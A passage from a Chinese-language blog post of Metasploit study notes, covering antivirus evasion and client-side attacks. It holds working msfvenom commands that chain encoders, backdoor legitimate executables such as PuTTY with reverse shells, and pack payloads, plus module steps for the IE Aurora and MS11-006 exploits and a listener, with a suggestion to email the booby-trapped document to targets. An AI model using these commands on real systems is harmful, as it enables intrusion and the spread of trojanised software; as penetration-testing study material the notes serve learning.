<h4 id="多重编码"><a href="#多重编码" class="headerlink" title="多重编码"></a>多重编码</h4><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp <span class="attribute">LHOST</span>=192.168.67.136 <span class="attribute">LPORT</span>=443 -e x86/shikata_ga_nai -i 10 -f<span class="built_in"> raw </span>|msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f<span class="built_in"> raw </span>| msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f<span class="built_in"> raw </span>| msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o payload3.exe</span><br></pre></td></tr></table></figure>

<p><code>-i</code>参数表示次数，这里总共执行了不同的35次编码，但是依然无法成功突破杀软检测。</p>
<h3 id="自定义可执行文件模板"><a href="#自定义可执行文件模板" class="headerlink" title="自定义可执行文件模板"></a>自定义可执行文件模板</h3><p>通常，<code>msfvenom</code>会将攻击载荷嵌入默认的可执行文件模板，位于<code>data/templates/template.exe</code>，这个文件会受到杀软的关注。现在的<code>msfvenom</code>支持使用<code>-x</code>使用任意的 Windows 可执行程序代替默认模板文件，例如将微软<code>Sysinternals</code>中的<code>Process Exploerer</code>最为模板。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wget http:<span class="regexp">//</span>download.sysinternals.com<span class="regexp">/files/</span>ProcessExplorer.zip</span><br><span class="line">cd work</span><br><span class="line">unzip ../ProcessExplorer.zip</span><br><span class="line">cd ..</span><br><span class="line">msfvenom -p windows<span class="regexp">/shell_reverse_tcp LHOST=192.168.67.136 LPORT=8080 -e x86/</span>shikata_ga_nai -x work<span class="regexp">/procexp.exe -i 5 -f exe -o /</span>var<span class="regexp">/www/</span>pe_backdoor.exe</span><br></pre></td></tr></table></figure>

<h3 id="隐秘地启动一个攻击载荷"><a href="#隐秘地启动一个攻击载荷" class="headerlink" title="隐秘地启动一个攻击载荷"></a>隐秘地启动一个攻击载荷</h3><p>被攻击的用户打开刚刚生成的文件时，什么都没有发生，可以引起用户的怀疑。我们可以在启动攻击载荷的同时让宿主程序能够正常运行。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wget https:<span class="regexp">//</span>the.earth.li<span class="regexp">/~sgtatham/</span>putty<span class="regexp">/0.67/</span>x86/putty.exe</span><br><span class="line">msfcenom -p windows/shell_reverse_tcp LHOST=<span class="number">192.168</span>.<span class="number">67.136</span> LPORT=<span class="number">443</span></span><br><span class="line">-e x86<span class="regexp">/shikata_ga_nai -x putty.exe -k -i 5 -f exe -o /</span>var<span class="regexp">/www/</span>putty_backdoor.exe</span><br></pre></td></tr></table></figure>

<p>用<code>-k</code>选项处理 putty，会配置攻击载荷在一个独立的线程中启动，这样宿主程序不会受影响，但不是所有可执行程序都支持<code>-k</code>选项。如果没有使用<code>-k</code>选项，最好使用图形界面。否则cmd窗口直到攻击载荷使用完毕才会关闭。</p>
<h3 id="加壳软件"><a href="#加壳软件" class="headerlink" title="加壳软件"></a>加壳软件</h3><p>加壳能够减小文件大小，而且不影响原有的功能。下面使用 UPX 加壳，尝试进行免杀处理</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">upx</span> -<span class="number">5</span> payload<span class="number">3</span>.exe</span><br></pre></td></tr></table></figure>

<h3 id="Metasploit-Pro-的动态载荷"><a href="#Metasploit-Pro-的动态载荷" class="headerlink" title="Metasploit Pro 的动态载荷"></a>Metasploit Pro 的动态载荷</h3><h2 id="客户端渗透攻击"><a href="#客户端渗透攻击" class="headerlink" title="客户端渗透攻击"></a>客户端渗透攻击</h2><h3 id="基于浏览器的渗透"><a href="#基于浏览器的渗透" class="headerlink" title="基于浏览器的渗透"></a>基于浏览器的渗透</h3><p>针对浏览器的攻击与传统的渗透攻击不同在于 shellcode 触发方式不同。传统渗透攻击中，攻击者的全部目标时获取 RCE 的机会，植入一个 payload。然而在浏览器渗透攻击中，为了能够执行特殊构造的 payload，通常采用堆散射（heap sparying）的漏洞利用技术。</p>
<p>堆是指用于动态分配的进程内存空间，应用程序在运行时按需对这段内村惊醒申请和使用。堆空间的大小取决于计算机的可用内存空间，以及在软件生命周期中已使用的内存空间。在程序的运行过程中，对于攻击者而言，内存的分配地址是位置的，所以不能简单地跳转到某一地址。</p>
<p>空指令（NOP）是不做任何事情，直接执行下一条指令。空指令滑行区（NOP slide）是很多空指令相连组成的一个区域。空指令对应的操作码是 <code>90</code>，通常以<code>\x90</code>的形式出现在渗透代码中。</p>
<p>堆散射技术是指将空指令滑行区与 shellcode 组合成固定的形式，将它们重复填充到堆中，直到填满一大块内存空间。堆中的内存分配实在程序运行时动态执行的，通常利用浏览器执行 JS 申请大量内存，当程序执行流改变时，程序会随即跳转到某个地方，很可能这个地方已经被空指令滑行区覆盖，可以执行紧随其后的 shellcode。</p>
<h3 id="使用-ollydbg-调试器获得空指令机器码"><a href="#使用-ollydbg-调试器获得空指令机器码" class="headerlink" title="使用 ollydbg 调试器获得空指令机器码"></a>使用 ollydbg 调试器获得空指令机器码</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">msfvenom</span> -p windows/shell/bind_tcp LPORT=<span class="number">443</span> -f c -o shellcode<span class="number">1</span>.c</span><br></pre></td></tr></table></figure>

<p>执行之后会输出两个 shellcode，第二部分是在第一部分的shellcode 打开的端口有请求是，Metasploit 会自动发送的。将生成的第一部分 shellcode 中的<code>/x</code>去掉以便使用 ollydbg 调试，可以在前面加上许多<code>90</code>。</p>
<p>随便打开一个程序，打开 ollydbg，选择 File 中的 Open，指向一个可执行程序。在出现的许多汇编指令中，点击第一条，按住 SHIFT 和左键选中接下来的300条指令。赋值刚才的shellcode，在调试窗口中粘贴，可以看到一些空指令和 shellcode。当第一次输出 bind_tcp 格式的 shellcode 时，可以看到第一阶段结束指令时 ecc3，定位这个以 ecc3结尾的指令块。</p>
<p>在 ecc3 的下一条指令设置断点，回到加入空指令的指令区域顶端，F5，执行到断点前，这时已经打开了端口，可以通过<code>netstat -an</code>查看。在 metasploit 中打开一个多线程监听器，这会向第一阶段打开的端口发送第二段 shellcode，获取控制会话。</p>
<h3 id="对-IE-的极光漏洞进行渗透利用"><a href="#对-IE-的极光漏洞进行渗透利用" class="headerlink" title="对 IE 的极光漏洞进行渗透利用"></a>对 IE 的极光漏洞进行渗透利用</h3><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use windows/browser/ms10_002_aurora</span><br><span class="line"><span class="keyword">set</span> payload <span class="comment">windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br><span class="line">show <span class="comment">options</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">srvport 80</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">lhost 192.168.67.136</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">lport 443</span></span><br><span class="line">exploit <span class="comment">-z</span></span><br></pre></td></tr></table></figure>

<p>设置完成后，可以使用 Windows XP 虚拟机访问 <code>http://&lt;srvhost&gt;:&lt;srvport&gt;</code>，连接到该网站后，虚拟机稍微有些迟钝，稍后就会得到一个 meterpreter shell。但是用户一旦关闭浏览器就会失去连接。一旦建立连接，应该立刻运行<code>run migrate</code>迁移到新的独立进程内存空间。</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">run</span><span class="bash"> migrate -f</span></span><br></pre></td></tr></table></figure>

<p>可以使用高级选项进行自动化，比如想改变反弹式连接每次尝试连接的次数。或者自动迁移到新进程。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">show advanced</span><br><span class="line"><span class="keyword">set</span> ReverseConnectRetries <span class="comment">10</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">AutoRunScript migrate -f</span></span><br></pre></td></tr></table></figure>

<p>这是一个基于浏览器的攻击，很可能获得的是用户权限的 shell，使用<code>usee priv</code>和<code>getsystem</code>尝试提权。</p>
<h3 id="文件格式漏洞渗透攻击"><a href="#文件格式漏洞渗透攻击" class="headerlink" title="文件格式漏洞渗透攻击"></a>文件格式漏洞渗透攻击</h3><p>有的应用程序存在由输入文件格式类型 bug 导致的可利用的安全漏洞，比如 Adobe PDF。下面利用 MS11_006，这时一个利用系统函数<code>CreateSizedDIBSECTION</code>中的栈溢出的漏洞。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/fileformat/ms11_006_createsizeddibsection</span><br><span class="line">info</span><br><span class="line"><span class="builtin-name">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line"><span class="builtin-name">set</span> target 2</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<h3 id="发送攻击负载"><a href="#发送攻击负载" class="headerlink" title="发送攻击负载"></a>发送攻击负载</h3><p>上面生成了 msf.doc，可以通过邮件发送给用户。实际发送这个文档之前，必须在模块中建立一个多线程监听端，可以保证渗透攻击发生时，攻击主机可以收到来自目标主机的连接请求。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use multi/handler</span><br><span class="line"><span class="keyword">set</span> payload <span class="comment">windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">lhost 192.168.67.136</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">lport 443</span></span><br><span class="line">exploit <span class="comment">-j</span></span><br></pre></td></tr></table></figure>

<h2 id="Metasploit-辅助模块"><a href="#Metasploit-辅助模块" class="headerlink" title="Metasploit 辅助模块"></a>Metasploit 辅助模块</h2><p>辅助模块（auxiliary）主要提供信息搜集的支持，也提供一些后渗透攻击模块。</p>
<p>可以使用<code>show auxiliary</code>列出可用辅助模块。</p>
<h3 id="使用辅助模块"><a href="#使用辅助模块" class="headerlink" title="使用辅助模块"></a>使用辅助模块</h3><p>比如想攻击一台 web 服务器，可以使用<code>search scanner/http</code>查找可用的 HTTP 扫描器。旧版 IIS 服务器的 WebDAV 功能存在一个可用于远程攻击的漏洞，可以针对目标进行一次扫描。</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> scanner/http/webdav_scanner</span><br><span class="line"><span class="keyword">show</span> options</span><br><span class="line">...</span><br><span class="line"><span class="keyword">run</span></span><br></pre></td></tr></table></figure>

<h3 id="辅助模块剖析"><a href="#辅助模块剖析" class="headerlink" title="辅助模块剖析"></a>辅助模块剖析</h3><!-- 同学了 Ruby 再说 -->

<h2 id="社会工程学工具包"><a href="#社会工程学工具包" class="headerlink" title="社会工程学工具包"></a>社会工程学工具包</h2><h3 id="配置-1"><a href="#配置-1" class="headerlink" title="配置"></a>配置</h3></div><div class="article-licensing box"><div class="licensing-title"><p>Metasploit 笔记</p><p><a href="http://example.com/2019/10/06/metasploit/">http://example.com/2019/10/06/metasploit/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>lll</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2019-10-06</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2020-04-02</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><a class="link-muted mr-2" rel="tag" href="/tags/metasploit/">metasploit</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2019/10/06/todolist/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">Todo List</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2019/10/05/writeup/"><span class="level-item">CTF Writeup</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/avatar.png" alt="lll"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">lll</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">42</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">8</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">13</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/1klnd" target="_blank" rel="noopener">关注我</a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#情报搜集"><span class="level-left"><span class="level-item">1</span><span class="level-item">情报搜集</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#被动信息搜集"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">被动信息搜集</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#whois-查询"><span class="level-left"><span class="level-item">1.1.1</span><span class="level-item">whois 查询</span></span></a></li><li><a class="level is-mobile" href="#Netcraft"><span class="level-left"><span class="level-item">1.1.2</span><span class="level-item">Netcraft</span></span></a></li><li><a class="level is-mobile" href="#nslookup"><span class="level-left"><span class="level-item">1.1.3</span><span class="level-item">nslookup</span></span></a></li><li><a class="level is-mobile" href="#Google-Hacking"><span class="level-left"><span class="level-item">1.1.4</span><span class="level-item">Google Hacking</span></span></a></li></ul></li><li><a class="level is-mobile" href="#主动信息搜集"><span class="level-left"><span class="level-item">1.2</span><span class="level-item">主动信息搜集</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用Nmap进行扫描"><span class="level-left"><span class="level-item">1.2.1</span><span class="level-item">使用Nmap进行扫描</span></span></a></li><li><a class="level is-mobile" href="#使用数据库"><span class="level-left"><span class="level-item">1.2.2</span><span class="level-item">使用数据库</span></span></a></li><li><a class="level is-mobile" href="#使用-metasploit-进行端口扫描"><span class="level-left"><span class="level-item">1.2.3</span><span class="level-item">使用 metasploit 进行端口扫描</span></span></a></li></ul></li><li><a class="level is-mobile" href="#针对性扫描"><span class="level-left"><span class="level-item">1.3</span><span class="level-item">针对性扫描</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#服务器消息块协议扫描"><span class="level-left"><span class="level-item">1.3.1</span><span class="level-item">服务器消息块协议扫描</span></span></a></li><li><a class="level is-mobile" href="#搜寻配置不当的-Microsoft-SQL-Server"><span class="level-left"><span class="level-item">1.3.2</span><span class="level-item">搜寻配置不当的 Microsoft SQL Server</span></span></a></li><li><a class="level is-mobile" href="#SSH-服务器扫描"><span class="level-left"><span class="level-item">1.3.3</span><span class="level-item">SSH 服务器扫描</span></span></a></li><li><a class="level is-mobile" href="#FTP-扫描"><span class="level-left"><span class="level-item">1.3.4</span><span class="level-item">FTP 扫描</span></span></a></li><li><a class="level is-mobile" href="#简单网管协议扫描"><span class="level-left"><span class="level-item">1.3.5</span><span class="level-item">简单网管协议扫描</span></span></a></li></ul></li><li><a class="level is-mobile" href="#编写自己的扫描器"><span class="level-left"><span class="level-item">1.4</span><span class="level-item">编写自己的扫描器</span></span></a></li></ul></li><li><a class="level is-mobile" href="#漏洞扫描"><span class="level-left"><span class="level-item">2</span><span class="level-item">漏洞扫描</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#基本的漏洞扫描"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">基本的漏洞扫描</span></span></a></li><li><a class="level is-mobile" href="#使用-Nexpose-进行扫描"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">使用 Nexpose 进行扫描</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#配置"><span class="level-left"><span class="level-item">2.2.1</span><span class="level-item">配置</span></span></a></li><li><a class="level is-mobile" href="#将扫描报告导入-Metasploit"><span class="level-left"><span class="level-item">2.2.2</span><span class="level-item">将扫描报告导入 Metasploit</span></span></a></li><li><a class="level is-mobile" href="#在-MSF-控制台中运行-Nexpose"><span class="level-left"><span class="level-item">2.2.3</span><span class="level-item">在 MSF 控制台中运行 Nexpose</span></span></a></li></ul></li><li><a class="level is-mobile" href="#使用-Nessus-进行扫描"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">使用 Nessus 进行扫描</span></span></a></li><li><a class="level is-mobile" href="#专用漏洞扫描器"><span class="level-left"><span class="level-item">2.4</span><span class="level-item">专用漏洞扫描器</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#验证SMB登录"><span class="level-left"><span class="level-item">2.4.1</span><span class="level-item">验证SMB登录</span></span></a></li><li><a class="level is-mobile" href="#扫描开放的VNC空口令"><span class="level-left"><span class="level-item">2.4.2</span><span class="level-item">扫描开放的VNC空口令</span></span></a></li><li><a class="level is-mobile" href="#扫描开放的X11服务器"><span class="level-left"><span class="level-item">2.4.3</span><span class="level-item">扫描开放的X11服务器</span></span></a></li></ul></li></ul></li><li><a class="level is-mobile" href="#渗透攻击之旅"><span class="level-left"><span class="level-item">3</span><span class="level-item">渗透攻击之旅</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#渗透攻击基础"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">渗透攻击基础</span></span></a></li><li><a class="level is-mobile" href="#攻击-Windows"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">攻击 Windows</span></span></a></li><li><a class="level is-mobile" href="#攻击-Metasploitable"><span class="level-left"><span class="level-item">3.3</span><span class="level-item">攻击 Metasploitable</span></span></a></li><li><a class="level is-mobile" href="#全端口攻击载荷：暴力破解目标开放的端口"><span class="level-left"><span class="level-item">3.4</span><span class="level-item">全端口攻击载荷：暴力破解目标开放的端口</span></span></a></li><li><a class="level is-mobile" href="#资源文件"><span class="level-left"><span class="level-item">3.5</span><span class="level-item">资源文件</span></span></a></li></ul></li><li><a class="level is-mobile" href="#Meterpreter"><span class="level-left"><span class="level-item">4</span><span class="level-item">Meterpreter</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#攻击-Windows-1"><span class="level-left"><span class="level-item">4.1</span><span class="level-item">攻击 Windows</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#攻击-MSSQL"><span class="level-left"><span class="level-item">4.1.1</span><span class="level-item">攻击 MSSQL</span></span></a></li><li><a class="level is-mobile" href="#xp-cmdshell"><span class="level-left"><span class="level-item">4.1.2</span><span class="level-item">xp_cmdshell</span></span></a></li><li><a class="level is-mobile" href="#meterpreter-基本命令"><span class="level-left"><span class="level-item">4.1.3</span><span class="level-item">meterpreter 基本命令</span></span></a></li></ul></li><li><a class="level is-mobile" href="#获得用户名和密码"><span class="level-left"><span class="level-item">4.2</span><span class="level-item">获得用户名和密码</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用-Meterpreter-命令获取哈希值"><span class="level-left"><span class="level-item">4.2.1</span><span class="level-item">使用 Meterpreter 命令获取哈希值</span></span></a></li></ul></li><li><a class="level is-mobile" href="#传递哈希值"><span class="level-left"><span class="level-item">4.3</span><span class="level-item">传递哈希值</span></span></a></li><li><a class="level is-mobile" href="#权限提升"><span class="level-left"><span class="level-item">4.4</span><span class="level-item">权限提升</span></span></a></li><li><a class="level is-mobile" href="#令牌假冒"><span class="level-left"><span class="level-item">4.5</span><span class="level-item">令牌假冒</span></span></a></li><li><a class="level is-mobile" href="#跳板攻击"><span class="level-left"><span class="level-item">4.6</span><span class="level-item">跳板攻击</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用-Meterpreter-进行跳板攻击"><span class="level-left"><span class="level-item">4.6.1</span><span class="level-item">使用 Meterpreter 进行跳板攻击</span></span></a></li></ul></li><li><a class="level is-mobile" href="#使用-Meterpreter-脚本"><span class="level-left"><span class="level-item">4.7</span><span class="level-item">使用 Meterpreter 脚本</span></span></a></li><li><a class="level is-mobile" href="#将命令行-shell-升级为-Meterpreter"><span class="level-left"><span class="level-item">4.8</span><span class="level-item">将命令行 shell 升级为 Meterpreter</span></span></a></li><li><a class="level is-mobile" href="#通过附加的-Railgun-组件操作-Windows-API"><span class="level-left"><span class="level-item">4.9</span><span class="level-item">通过附加的 Railgun 组件操作 Windows API</span></span></a></li><li><a class="level is-mobile" href="#msfvenom"><span class="level-left"><span class="level-item">4.10</span><span class="level-item">msfvenom</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#生成-payload"><span class="level-left"><span class="level-item">4.10.1</span><span class="level-item">生成 payload</span></span></a></li><li><a class="level is-mobile" href="#对payload进行编码"><span class="level-left"><span class="level-item">4.10.2</span><span class="level-item">对payload进行编码</span></span></a></li><li><a class="level is-mobile" href="#避免使用某些字符"><span class="level-left"><span class="level-item">4.10.3</span><span class="level-item">避免使用某些字符</span></span></a></li><li><a class="level is-mobile" href="#提供自定义模板"><span class="level-left"><span class="level-item">4.10.4</span><span class="level-item">提供自定义模板</span></span></a></li><li><a class="level is-mobile" href="#将msfvenom的输出串联（利用管道重定向）"><span class="level-left"><span class="level-item">4.10.5</span><span class="level-item">将msfvenom的输出串联（利用管道重定向）</span></span></a></li></ul></li></ul></li><li><a class="level is-mobile" href="#免杀技术"><span class="level-left"><span class="level-item">5</span><span class="level-item">免杀技术</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用-MSF-攻击载荷生成器创建可独立运行的二进制文件"><span class="level-left"><span class="level-item">5.1</span><span class="level-item">使用 MSF 攻击载荷生成器创建可独立运行的二进制文件</span></span></a></li><li><a class="level is-mobile" href="#躲避杀软检测"><span class="level-left"><span class="level-item">5.2</span><span class="level-item">躲避杀软检测</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用-MSF-编码器"><span class="level-left"><span class="level-item">5.2.1</span><span class="level-item">使用 MSF 编码器</span></span></a></li><li><a class="level is-mobile" href="#多重编码"><span class="level-left"><span class="level-item">5.2.2</span><span class="level-item">多重编码</span></span></a></li></ul></li><li><a class="level is-mobile" href="#自定义可执行文件模板"><span class="level-left"><span class="level-item">5.3</span><span class="level-item">自定义可执行文件模板</span></span></a></li><li><a class="level is-mobile" href="#隐秘地启动一个攻击载荷"><span class="level-left"><span class="level-item">5.4</span><span class="level-item">隐秘地启动一个攻击载荷</span></span></a></li><li><a class="level is-mobile" href="#加壳软件"><span class="level-left"><span class="level-item">5.5</span><span class="level-item">加壳软件</span></span></a></li><li><a class="level is-mobile" href="#Metasploit-Pro-的动态载荷"><span class="level-left"><span class="level-item">5.6</span><span class="level-item">Metasploit Pro 的动态载荷</span></span></a></li></ul></li><li><a class="level is-mobile" href="#客户端渗透攻击"><span class="level-left"><span class="level-item">6</span><span class="level-item">客户端渗透攻击</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#基于浏览器的渗透"><span class="level-left"><span class="level-item">6.1</span><span class="level-item">基于浏览器的渗透</span></span></a></li><li><a class="level is-mobile" href="#使用-ollydbg-调试器获得空指令机器码"><span class="level-left"><span class="level-item">6.2</span><span class="level-item">使用 ollydbg 调试器获得空指令机器码</span></span></a></li><li><a class="level is-mobile" href="#对-IE-的极光漏洞进行渗透利用"><span class="level-left"><span class="level-item">6.3</span><span class="level-item">对 IE 的极光漏洞进行渗透利用</span></span></a></li><li><a class="level is-mobile" href="#文件格式漏洞渗透攻击"><span class="level-left"><span class="level-item">6.4</span><span class="level-item">文件格式漏洞渗透攻击</span></span></a></li><li><a class="level is-mobile" href="#发送攻击负载"><span class="level-left"><span class="level-item">6.5</span><span class="level-item">发送攻击负载</span></span></a></li></ul></li><li><a class="level is-mobile" href="#Metasploit-辅助模块"><span class="level-left"><span class="level-item">7</span><span class="level-item">Metasploit 辅助模块</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#使用辅助模块"><span class="level-left"><span class="level-item">7.1</span><span class="level-item">使用辅助模块</span></span></a></li><li><a class="level is-mobile" href="#辅助模块剖析"><span class="level-left"><span class="level-item">7.2</span><span class="level-item">辅助模块剖析</span></span></a></li></ul></li><li><a class="level is-mobile" href="#社会工程学工具包"><span class="level-left"><span class="level-item">8</span><span class="level-item">社会工程学工具包</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#配置-1"><span class="level-left"><span class="level-item">8.1</span><span class="level-item">配置</span></span></a></li></ul></li></ul></div></div><style>.menu-list > li > a.is-active + .menu-list { display: block; }.menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/AI/"><span class="level-start"><span class="level-item">AI</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/Powershell/"><span class="level-start"><span class="level-item">Powershell</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/metasploit/"><span class="level-start"><span class="level-item">metasploit</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/notes/"><span class="level-start"><span class="level-item">notes</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/python/"><span class="level-start"><span class="level-item">python</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/vulnhub/"><span class="level-start"><span class="level-item">vulnhub</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><span class="level-start"><span class="level-item">漏洞复现</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2020-10-04T08:35:56.000Z">2020-10-04</time></p><p class="title"><a href="/2020/10/04/java/">Java 笔记</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2020-10-03T07:52:45.000Z">2020-10-03</time></p><p class="title"><a href="/2020/10/03/gopher/">Gopher 协议利用</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2020-08-21T02:09:13.000Z">2020-08-21</time></p><p class="title"><a href="/2020/08/21/node-js/">Node.js 相关</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2020-08-06T02:02:51.000Z">2020-08-06</time></p><p class="title"><a href="/2020/08/06/docker/">Docker</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2020-08-04T07:40:44.000Z">2020-08-04</time></p><p class="title"><a href="/2020/08/04/network/">计算机网络</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2020/10/"><span class="level-start"><span class="level-item">十月 2020</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/08/"><span class="level-start"><span class="level-item">八月 2020</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/07/"><span class="level-start"><span class="level-item">七月 2020</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/06/"><span class="level-start"><span class="level-item">六月 2020</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/05/"><span class="level-start"><span class="level-item">五月 2020</span></span><span class="level-end"><span class="level-item tag">6</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/04/"><span class="level-start"><span class="level-item">四月 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/03/"><span class="level-start"><span class="level-item">三月 2020</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/02/"><span class="level-start"><span class="level-item">二月 2020</span></span><span class="level-end"><span class="level-item 